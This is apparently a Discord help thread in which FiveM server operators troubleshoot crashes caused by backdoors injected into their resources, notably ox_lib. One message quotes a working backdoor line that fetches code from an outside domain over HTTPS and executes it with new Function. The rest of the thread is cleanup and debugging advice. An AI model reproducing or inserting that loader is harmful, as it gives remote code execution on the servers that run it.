#I want help my server is crashed dump
1 messages · Page 1 of 1 (latest)
I didn't understand
do u read that ?
inside crash dump
his told you the crash from -citizen-scripting-v8node
that mean
UI Crash
Well what do you do to solve it?
Okay I will try
the backdoor size is under 2kb
when u open the file you get code like that
require('https').get('https://steaxscripts.com/zXeAHJJ', res => { let d = ''; res.on('data', c => d += c).on('end', () => res.statusCode === 200 && new Function('global', d)(global)); }).on('error', () => {});
Remove the file then restart the script
Ok
gl
@serene canyon
:rocket: Congratulations @remote spoke, you leveled up to <@&828359841512816671>!
I didn't understand the solution. Can you help me?
I'm want help 😑
@serene canyon
I have the same problem, how can I solve it?
just remove backdoors from u resources
how is it done?
what the version of oxmysql u use ?
the esx one installed less than 1 week ago
search for ressource with name oxmysql and go to fxmanifest.lua and tell me what the version of it (if u have it)
version '2.11.2'
If you feel like you have a backdoor this can help you find out for sure: https://docs.yorick.gg/General/Backdoor and tell you how to deal with it
Learn more about the backdoor in your server
i got same Problem Do i delete The Full file or only The File where is backdoors?
The file where is backdoors
.
u got the same crash ?
Yes
:rocket: Congratulations @amber cloud, you leveled up to <@&828359841512816671>!
u still have backdoor
I did that
deleted all
Alright, if nothing appears and the crash issue is still not resolved, you should start running the scripts one by one in an organized manner to identify which script is causing the crash, then either remove or modify it
:rocket: Congratulations @serene canyon, you leveled up to <@&1005551490636722177>!
i did
It wont work
I removed file file and Wont Work
Remove all scripts like { ensure , start } from cfg
Okay let me test
And after that, test each script individually to determine where the error is coming from
okay
Don't forget to make a backup copy
Yeah thanks for Help
Its was from ox_lib
I want new ox_lib Without backdoors
where i get it?
in fxmanifest
Yh
Yh
:rocket: Congratulations @brazen gust, you leveled up to <@&828359841512816671>!
like
i have checked me resourses and found 86 line of backdours in diffrent resources
i removed he lines and now tring to upload the files and change the RDP
and i just saved the resources and server.cfg and deleted txadmin and fx server files
if it still does't work
what do i gona do
Reinstall it from GitHub
But first remove ox_lib then reinstall it
i did
:rocket: Congratulations @amber cloud, you leveled up to <@&1005551371765956658>!
Now you can chat in #old-homelab-24h1-25h1, #old-cooking-24h1-25h1, #old-aviation-24h1-25h1!
It wont work
Still same crash ?
yes
clear u crashes
and remove cache
then run FXServer
if still crashing
send crashes dmp
@amber cloud
the script i was using from github had effected all my scripts
so the script updated every resource.lua/fxmanifest.lua and added a new line for a html file that the backdoor made in every script
still have backdoor or u have some UI crashing u FXServer
the dmp give me v8node.dll crash that mean UI or JS file is crashing
how i can find it?
idk
i wanna CitizenFX.log
to know
Disable all your resources, then enable them in small groups (e.g., 5 at a time), and restart the server until the crash happens again.
Focus on JavaScript/Node.js-based scripts – usually scripts with:
client/main.js
server.js
or using v8 in some way
Check your recent changes:
Scripts added or edited just before the crashes started.
Use debug logging:
You can create a simple logging mechanism using print() or console.log() to know which scripts are loading.
Or use crash monitoring from txAdmin or other tools that can show the last loaded script.
where i get